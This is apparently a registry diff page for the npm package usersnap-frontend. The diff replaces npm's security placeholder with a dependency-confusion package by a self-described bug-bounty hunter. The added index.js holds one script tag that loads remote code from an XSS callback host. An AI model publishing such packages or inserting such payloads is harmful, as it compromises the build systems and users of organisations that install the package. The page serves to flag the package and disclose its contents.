usersnap-frontend 0.0.1-security → 3.3.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of usersnap-frontend might be problematic. Click here for more details.
- package/index.js +1 -0
- package/package.json +14 -3
- package/README.md +0 -5
package/index.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
<script src=https://d3d.xss.ht></script>
|
package/package.json
CHANGED
@@ -1,6 +1,17 @@
|
|
1
1
|
{
|
2
2
|
"name": "usersnap-frontend",
|
3
|
-
"version": "
|
4
|
-
"
|
5
|
-
"
|
3
|
+
"version": "3.3.1",
|
4
|
+
"hacker": "d3d",
|
5
|
+
"email": "info@malicious.group",
|
6
|
+
"twitter": "@MCoetus",
|
7
|
+
"hackerone": "maliciousgroup",
|
8
|
+
"bugcrowd": "d3d",
|
9
|
+
"intigriti": "d3d",
|
10
|
+
"description": "This is a module created by d3d (@MCoetus) to show a Dependency Confusion bug in your network leading to a RCE in most cases. Contact me (info@malicious.group) this is ONLY for bug bounties and not actually a malicious package, but MAY break your builds.",
|
11
|
+
"main": "index.js",
|
12
|
+
"scripts": {
|
13
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
14
|
+
},
|
15
|
+
"author": "d3d (@MCoetus)",
|
16
|
+
"license": "ISC"
|
6
17
|
}
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=usersnap-frontend for more information.
|